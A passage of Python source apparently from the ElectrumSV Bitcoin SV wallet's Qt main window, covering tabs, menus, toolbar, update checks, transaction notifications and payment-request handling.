add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"),
_("Con&sole"), "console")
add_optional_tab(tabs, self.coinsplitting_tab, read_QIcon("tab_coins.png"),
_("Coin Splitting"), "coinsplitter", True)
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
# Some tabs may want to be refreshed to show current state when selected.
def on_tab_changed(to_tab_index):
current_tab = self.tabs.currentWidget()
if current_tab is self.coinsplitting_tab:
self.coinsplitting_tab.update_layout()
self.tabs.currentChanged.connect(on_tab_changed)
if self.config.get("is_maximized"):
self.showMaximized()
self.init_menubar()
self.init_toolbar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self,
lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self,
lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self,
lambda i=i: wrtabs.setCurrentIndex(i))
self.network_status_task = app_state.async_.spawn(self.maintain_network_status)
self.network_status_signal.connect(self.update_network_status)
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.notify_transactions_signal.connect(self.notify_transactions)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['updated', 'new_transaction', 'status',
'banner', 'verified', 'fee']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.main_server.state.banner)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
self.new_fx_quotes_signal.connect(self.on_fx_quotes)
self.new_fx_history_signal.connect(self.on_fx_history)
self.load_wallet()
self.app.timer.timeout.connect(self.timer_actions)
def on_history(self, b):
self.new_fx_history_signal.emit()
def on_fx_history(self):
self.history_list.refresh_headers()
self.history_list.update()
self.address_list.update()
# inform things like address_dialog that there's a new history
self.history_updated_signal.emit()
def on_quotes(self, b):
self.new_fx_quotes_signal.emit()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if app_state.fx.history_used_spot:
self.history_list.update()
self.history_updated_signal.emit()
def toggle_tab(self, tab):
show = self.tabs.indexOf(tab) == -1
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide") if show else _("Show")) + " " + tab.tab_description
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
return self.top_level_window_recurse(override)
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_exception(self, exception):
if not isinstance(exception, UserCancelled):
self.logger.exception("")
self.show_error(str(exception))
def on_error(self, exc_info):
self.on_exception(exc_info[1])
def on_network(self, event, *args):
if event == 'updated':
self.need_update.set()
elif event == 'new_transaction':
tx, wallet = args
if wallet == self.wallet: # filter out tx's not for this wallet
self.tx_notifications.append(tx)
self.notify_transactions_signal.emit()
self.need_update.set()
elif event in ['status', 'banner', 'verified', 'fee']:
# Handle in GUI thread
self.network_signal.emit(event, args)
else:
self.logger.debug("unexpected network message event='%s' args='%s'", event, args)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
if event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(self.network.main_server.state.banner)
elif event == 'verified':
self.history_list.update_item(*args)
elif event == 'fee':
pass
else:
self.logger.debug("unexpected network_qt signal event='%s' args='%s'", event, args)
def load_wallet(self):
wallet = self.wallet
self.logger = logs.get_logger("mainwindow[{}]".format(self.wallet.basename()))
self.update_recently_visited(wallet.storage.path)
# address used to create a dummy transaction and estimate transaction fee
self.history_list.update()
self.address_list.update()
self.utxo_list.update()
self.need_update.set()
# Once GUI has been initialized check if we want to announce something since the
# callback has been called before the GUI was initialized
self.notify_transactions()
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.app.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
self.history_updated_signal.emit()
wallet.create_gui_handlers(self)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.logger.debug("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
title = f'ElectrumSV {PACKAGE_VERSION} ({Net.NAME}) - {self.wallet.basename()}'
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
self.warn_if_watching_only()
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.can_change_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Bitcoin SV with it."),
_("Make sure you own the seed phrase or the private keys, "
"before you request Bitcoin SV to be sent to this wallet.")
])
self.show_warning(msg, title=_('Information'))
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
if not os.path.exists(wallet_folder):
wallet_folder = None
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.app.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename, __ = QFileDialog.getSaveFileName(
self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
# Copy file contents
shutil.copyfile(path, new_path)
# Copy file attributes if possible
# (not supported on targets like Flatpak documents)
try:
shutil.copystat(path, new_path)
except (IOError, os.error):
pass
self.show_message(_("A copy of your wallet file was created in")
+" '%s'" % str(new_path), title=_("Wallet backup created"))
except (IOError, os.error) as reason:
self.show_critical(_("ElectrumSV was unable to copy your wallet file "
"to the specified location.") + "\n" + str(reason),
title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)][:10]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
basenames = [os.path.basename(path) for path in recent]
counts = Counter(basenames)
pairs = sorted((basename if counts[basename] == 1 else path, path)
for basename, path in zip(basenames, recent))
for menu_text, path in pairs:
self.recently_visited_menu.addAction(menu_text, partial(self.app.new_window, path))
self.recently_visited_menu.setEnabled(bool(pairs))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.config.get_wallet_path()))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
i = 1
while True:
filename = "wallet_%d" % i
if filename in os.listdir(wallet_folder):
i += 1
else:
break
full_path = os.path.join(wallet_folder, filename)
self.app.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_master_public_keys)
if Net.NAME in ("testnet", "scalingtestnet"):
def temp_func():
from importlib import reload
from . import wallet_wizard
reload(wallet_wizard)
wallet_wizard.open_wallet_wizard()
wallet_menu.addAction(_("&New Wizard"), temp_func)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"),
self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"),
self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"),
self.import_addresses)
wallet_menu.addSeparator()
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), partial(edit_contact_dialog, self._api))
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), self.invoice_list.import_invoices)
hist_menu = wallet_menu.addMenu(_("&History"))
hist_menu.addAction("Export", self.export_history_dialog)
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.tabs.indexOf(tab) > -1
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.coinsplitting_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools"))
tools_menu.addAction(_("Preferences"), self.preferences_dialog)
tools_menu.addAction(_("&Network"), lambda: self.app.show_network_dialog(self))
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.do_process_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Check for updates"), self.show_update_check)
help_menu.addAction(_("&Official website"), lambda: webbrowser.open("http://electrumsv.io"))
help_menu.addSeparator()
help_menu.addAction(_("Documentation"),
lambda: webbrowser.open("http://electrumsv.readthedocs.io/")
).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def init_toolbar(self):
self.toolbar = toolbar = QToolBar(self)
icon_size = self.app.dpi / 5.8
toolbar.setMovable(False)
toolbar.setIconSize(QSize(icon_size, icon_size))
toolbar.setToolButtonStyle(Qt.ToolButtonTextUnderIcon)
make_payment_action = QAction(read_QIcon("icons8-initiate-money-transfer-80.png"),
_("Make Payment"), self)
make_payment_action.triggered.connect(self.new_payment)
toolbar.addAction(make_payment_action)
spacer = QWidget(self)
spacer.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Preferred)
spacer.setVisible(True)
self.spacer_action = toolbar.addWidget(spacer)
log_action = QAction(read_QIcon("icons8-moleskine-80.png"), _("Log Viewer"), self)
log_action.triggered.connect(self.app.show_log_viewer)
toolbar.addAction(log_action)
network_action = QAction(read_QIcon("network.png"), _("Network"), self)
network_action.triggered.connect(lambda: self.app.show_network_dialog(self))
toolbar.addAction(network_action)
preferences_action = QAction(read_QIcon("preferences.png"), _("Preferences"), self)
preferences_action.triggered.connect(self.preferences_dialog)
toolbar.addAction(preferences_action)
self._update_check_state = "default"
update_action = QAction(
read_QIcon("icons8-available-updates-80-blue"), _("Update Check"), self)
def _update_show_menu(checked: bool = False):
self._update_menu.exec(QCursor.pos())
update_action.triggered.connect(_update_show_menu)
self._update_action = update_action
toolbar.addAction(update_action)
self._update_check_toolbar_update()
toolbar.insertSeparator(update_action)
self.addToolBar(toolbar)
self.setUnifiedTitleAndToolBarOnMac(True)
def add_toolbar_action(self, action: QAction) -> None:
self.toolbar.insertAction(self.spacer_action, action)
def _update_check_toolbar_update(self):
update_check_state = "default"
check_result = self.config.get('last_update_check')
stable_version = "?"
if check_result is not None:
# The latest stable release date, the date of the build we are using.
stable_result = check_result["stable"]
stable_signers = get_identified_release_signers(stable_result)
if stable_signers:
release_date, current_date = get_update_check_dates(stable_result["date"])
if release_date > current_date:
if time.time() - release_date.timestamp() < 24 * 60 * 60:
update_check_state = "update-present-immediate"
else:
update_check_state = "update-present-prolonged"
stable_version = stable_result["version"]
def _on_check_for_updates(checked: bool=False):
self.show_update_check()
def _on_view_pending_update(checked: bool=False):
QDesktopServices.openUrl(QUrl("https://electrumsv.io/#downloads"))
menu = QMenu()
self._update_menu = menu
self._update_check_action = menu.addAction(
_("Check for Updates"), _on_check_for_updates)
if update_check_state == "default":
icon_path = "icons8-available-updates-80-blue"
icon_text = _("Updates")
tooltip = _("Check for Updates")
menu.setDefaultAction(self._update_check_action)
elif update_check_state == "update-present-immediate":
icon_path = "icons8-available-updates-80-yellow"
icon_text = f"{stable_version}"
tooltip = _("A newer version of ElectrumSV is available, and "+
"was released on {0:%c}").format(release_date)
self._update_view_pending_action = menu.addAction(
_("View Pending Update"), _on_view_pending_update)
menu.setDefaultAction(self._update_view_pending_action)
elif update_check_state == "update-present-prolonged":
icon_path = "icons8-available-updates-80-red"
icon_text = f"{stable_version}"
tooltip = _("A newer version of ElectrumSV is available, and "+
"was released on {0:%c}").format(release_date)
self._update_view_pending_action = menu.addAction(
_("View Pending Update"), _on_view_pending_update)
menu.setDefaultAction(self._update_view_pending_action)
# Apply the update state.
self._update_action.setMenu(menu)
self._update_action.setIcon(read_QIcon(icon_path))
self._update_action.setText(icon_text)
self._update_action.setToolTip(tooltip)
self._update_check_state = update_check_state
def on_update_check(self, success, result):
if success:
stable_result = result["stable"]
stable_signers = get_identified_release_signers(stable_result)
if stable_signers:
# The latest stable release date, the date of the build we are using.
stable_date_string = stable_result["date"]
release_date, current_date = get_update_check_dates(stable_date_string)
if release_date > current_date:
self.app.tray.showMessage(
"ElectrumSV",
_("A new version of ElectrumSV, version {}, is available for download")
.format(stable_result["version"]),
read_QIcon("electrum_dark_icon"), 20000)
self._update_check_toolbar_update()
def new_payment(self):
from . import payment
from importlib import reload
reload(payment)
self.w = payment.PaymentWindow(self._api, parent=self)
self.w.show()
def donate_to_server(self):
server = self.network.main_server
addr = server.state.donation_address
if is_address_valid(addr):
addr = Address.from_string(addr)
self.pay_to_URI(web.create_URI(addr, 0, _('Donation for {}').format(server.host)))
else:
self.show_error(_('The server {} has not provided a valid donation address')
.format(server))
def show_about(self):
QMessageBox.about(self, "ElectrumSV",
_("Version")+" %s" % (self.wallet.electrum_version) + "\n\n" +
_("ElectrumSV's focus is speed, with low resource usage and simplifying "
"Bitcoin SV. You do not need to perform regular backups, because your "
"wallet can be recovered from a secret phrase that you can memorize or "
"write on paper. Startup times are instant because it operates in "
"conjunction with high-performance servers that handle the most complicated "
"parts of the Bitcoin SV system." + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_update_check(self):
from . import update_check
update_check.UpdateCheckDialog()
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
"<a href=\"https://github.com/ElectrumSV/ElectrumSV/issues"
"\">https://github.com/ElectrumSV/ElectrumSV/issues</a><br/><br/>",
_("Before reporting a bug, upgrade to the most recent version of ElectrumSV "
"(latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="ElectrumSV - " + _("Reporting Bugs"))
last_notify_tx_time = 0.0
notify_tx_rate = 30.0
def notify_tx_cb(self):
n_ok = 0
if self.network and self.network.is_connected() and self.wallet:
num_txns = len(self.tx_notifications)
if num_txns:
# Combine the transactions
total_amount = 0
for tx in self.tx_notifications:
if tx:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if v > 0 and is_relevant:
total_amount += v
n_ok += 1
if n_ok:
self.logger.debug("Notifying GUI %d tx", n_ok)
if n_ok > 1:
self.notify(_("{} new transactions received: Total amount received "
"in the new transactions {}")
.format(n_ok, self.format_amount_and_units(total_amount)))
else:
self.notify(_("New transaction received: {}").format(
self.format_amount_and_units(total_amount)))
self.tx_notifications = list()
self.last_notify_tx_time = time.time() if n_ok else self.last_notify_tx_time
if self.tx_notify_timer:
self.tx_notify_timer.stop()
self.tx_notify_timer = None
def notify_transactions(self):
if self.tx_notify_timer or not len(self.tx_notifications) or self.cleaned_up:
# common case: extant notify timer -- we already enqueued to notify. So bail
# and wait for timer to handle it.
return
elapsed = time.time() - self.last_notify_tx_time
if elapsed < self.notify_tx_rate:
# spam control. force tx notify popup to not appear more often than every 30
# seconds by enqueing the request for a timer to handle it sometime later
self.tx_notify_timer = QTimer(self)
self.tx_notify_timer.setSingleShot(True)
self.tx_notify_timer.timeout.connect(self.notify_tx_cb)
when = (self.notify_tx_rate - elapsed)
self.logger.debug("Notify spam control: will notify GUI of %d new tx's in %f seconds",
len(self.tx_notifications), when)
self.tx_notify_timer.start(when * 1e3) # time in ms
else:
# it's been a while since we got a tx notify -- so do it immediately (no timer
# necessary)
self.notify_tx_cb()
def notify(self, message):
self.app.tray.showMessage("ElectrumSV", message,
read_QIcon("electrum_dark_icon"), 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path
# selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getOpenFileNames(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileNames, __ = QFileDialog.getOpenFileNames(self, title, directory, filter)
if fileNames and directory != os.path.dirname(fileNames[0]):
self.config.set_key('io_dir', os.path.dirname(fileNames[0]), True)
return fileNames
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join( directory, filename )
fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def timer_actions(self):
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
# resolve aliases (used to be used for openalias)
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, app_state.num_zeros, app_state.decimal_point,
is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' ' + app_state.base_unit()
x = app_state.fx.format_amount_and_units(amount)
if text and x:
text += ' (%s)'%x
return text
def get_amount_and_units(self, amount: int) -> Tuple[str, str]:
bitcoin_text = self.format_amount(amount) + ' ' + app_state.base_unit()
if app_state.fx.is_enabled():
fiat_text = app_state.fx.format_amount_and_units(amount)
else:
fiat_text = ''
return bitcoin_text, fiat_text
def format_fee_rate(self, fee_rate: int) -> str:
return format_fee_satoshis(fee_rate/1000, app_state.num_zeros) + ' sat/B'
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = app_state.fx.exchange_rate() if app_state.fx else None
if rate is None or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(app_state.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
async def maintain_network_status(self):
while True:
await self.wallet.progress_event.wait()
self.network_status_signal.emit(self.wallet)
# Throttle updates
await asyncio.sleep(1.0)
def update_network_status(self, wallet):
if wallet != self.wallet:
return
text = _("Offline")
if self.network:
if wallet.request_count > wallet.response_count:
text = _("Synchronizing...")
text += f' {wallet.response_count:,d}/{wallet.request_count:,d}'
else:
wallet.request_count = 0
wallet.response_count = 0
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
if server_lag > 1:
text = _("Server {} blocks behind").format(server_lag)
else:
text = _("Connected")
self._status_bar.set_network_status(text)
def update_status(self):
balance_status = False
fiat_status = None
if self.network and self.network.is_connected():
balance_status = True
# append fiat balance and price
if app_state.fx.is_enabled():
c, u, x = self.wallet.get_balance()
fiat_status = app_state.fx.get_fiat_status(
c, app_state.base_unit(), app_state.decimal_point)
self.set_status_bar_balance(balance_status)
self._status_bar.set_fiat_status(fiat_status)
@profiler
def update_wallet(self):
self.update_status()
if self.wallet.is_synchronized() or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self):
self.history_list.update()
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.history_updated_signal.emit()
def create_history_tab(self):
from .history_list import HistoryList
self.history_list = l = HistoryList(self)
l.searchable_list = l
return l
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, tx_desc=None, prompt_if_unsaved=False):
'''tx_desc is set only for txs created in the Send tab'''
tx_dialog = TxDialog(tx, self, tx_desc, prompt_if_unsaved)
tx_dialog.finished.connect(partial(self.on_tx_dialog_finished, tx_dialog))
self.tx_dialogs.append(tx_dialog)
tx_dialog.show()
return tx_dialog
def on_tx_dialog_finished(self, tx_dialog, status):
tx_dialog.finished.disconnect()
self.tx_dialogs.remove(tx_dialog)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_address = None
self.receive_address_e = ButtonsLineEdit()
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
msg = _('Bitcoin SV address where the payment should be received. '
'Note that each payment request uses a different Bitcoin SV address.')
self.receive_address_label = HelpLabel(_('Receiving address'), msg)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.receive_address_e.setFocusPolicy(Qt.NoFocus)
grid.addWidget(self.receive_address_label, 0, 0)
grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 1, 0)
grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit()
grid.addWidget(QLabel(_('Requested amount')), 2, 0)
grid.addWidget(self.receive_amount_e, 2, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(app_state.fx.get_currency if app_state.fx else '')
if not app_state.fx or not app_state.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.expires_combo = QComboBox()
self.expires_combo.addItems([i[0] for i in expiration_values])
self.expires_combo.setCurrentIndex(3)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them '
'a signed payment request.'),
_('Expired requests have to be deleted manually from your list, '
'in order to free the corresponding Bitcoin SV addresses.'),
_('The Bitcoin SV address never expires and will always be part '
'of this ElectrumSV wallet.'),
])
grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0)
grid.addWidget(self.expires_combo, 3, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 3, 1)
self.save_request_button = QPushButton(_('Save'))
self.save_request_button.clicked.connect(self.save_payment_request)
self.new_request_button = QPushButton(_('New'))
self.new_request_button.clicked.connect(self.new_payment_request)
self.receive_qr = QRCodeWidget(fixedSize=200)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(
QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.save_request_button)
buttons.addWidget(self.new_request_button)
grid.addLayout(buttons, 4, 1, 1, 2)
self.receive_requests_label = QLabel(_('Requests'))
from .request_list import RequestList
self.request_list = RequestList(self)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addWidget(self.receive_qr)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_payment_request(self, addr):
self.wallet.remove_payment_request(addr, self.config)
self.request_list.update()
self.clear_receive_tab()
def get_request_URI(self, addr):
req = self.wallet.receive_requests[addr]
message = self.wallet.labels.get(addr.to_string(), '')
amount = req['amount']
URI = web.create_URI(addr, amount, message)
if req.get('time'):
URI += "&time=%d"%req.get('time')
if req.get('exp'):
URI += "&exp=%d"%req.get('exp')
return str(URI)
def save_payment_request(self):
if not self.receive_address:
self.show_error(_('No receiving address'))
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
if not message and not amount:
self.show_error(_('No message or amount'))
return False
i = self.expires_combo.currentIndex()
expiration = [x[1] for x in expiration_values][i]
req = self.wallet.make_payment_request(self.receive_address, amount,
message, expiration)
self.wallet.add_payment_request(req, self.config)
self.request_list.update()
self.address_list.update()
self.save_request_button.setEnabled(False)
def view_and_paste(self, title, msg, data):
dialog = WindowModalDialog(self, title)
vbox = QVBoxLayout()
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
pr_e = ShowQRTextEdit(text=data)
vbox.addWidget(pr_e)
vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def export_payment_request(self, addr):
r = self.wallet.receive_requests[addr]
pr_data = paymentrequest.PaymentRequest.from_wallet_entry(r).to_json()
name = r['id'] + '.bip270.json'
fileName = self.getSaveFileName(_("Select where to save your payment request"),
name, "*.bip270.json")
if fileName:
with open(fileName, "w") as f:
f.write(pr_data)
self.show_message(_("Request saved successfully"))
self.saved = True
def new_payment_request(self):
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which '
'cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
if not self.question(_(
'Warning: The next address will not be recovered automatically if '
'you restore your wallet from seed; you may need to add it manually.\n\n'
'This occurs because you have too many unused addresses in your wallet. '
'To avoid this situation, use the existing addresses first.\n\n'
'Create anyway?'
)):
return
addr = self.wallet.create_new_address(False)
self.set_receive_address(addr)
self.expires_label.hide()
self.expires_combo.show()
